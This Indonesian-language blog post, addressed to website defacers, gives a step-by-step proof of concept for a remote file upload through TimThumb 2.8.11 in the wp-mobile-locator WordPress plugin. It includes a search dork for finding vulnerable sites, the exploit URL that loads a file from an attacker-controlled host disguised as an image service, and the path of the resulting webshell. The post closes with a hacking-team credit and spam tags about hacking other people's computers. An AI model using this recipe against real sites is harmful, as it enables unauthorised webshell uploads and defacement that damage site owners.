Wordpress Plugins Mobile Locator Timthumb 2.8.11 Remote File Upload

Haaai
Selamat Malam para defacer

Penjelasan singkat :
Wp-mobile-locator ...
adalah sebuah plugins wordpress sederhana berbasis plugins ... sederhana bukan ? hahahaha ...

oke next ...
POC :
1. find targets with dorks :
 inurl:/wp-content/plugins/wp-mobile-locator/
2. exploit :
/timthumb.php
3. NOTE* : pastikan kamu mendapatkan sebuah subdomain yang terintegrasi pada uploader images website seperti picasa,flixr,blogger dll .
jika sudah ...
maka untuk itu silahkan tambahkan Code ini dibelakang timthumb.php
timthumb.php?src=<yourevilcode>
ex : <site>/wp-content/plugins/wp-mobile-locator/timthumb.php?src=http://picasa.target.com/kepo/files...

lalu ENTER
jika berhasil maka webshellnya berada di path :
/wp-content/plugins/wp-mobile-detector/cache/kepo.php

JALAN LAIN ? di resize.php
POCnya ? Sama seperti diatas :) ...
selamat mencoba ~ 
Terima Kasih Mr.XSecr3t | Indonesian Cyber DarkNet Team :)
Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
Share this article please, on :
Share on fb Tweet Share on G+

0 Response to "Wordpress Plugins Mobile Locator Timthumb 2.8.11 Remote File Upload"

Post a Comment

Powered by Blogger.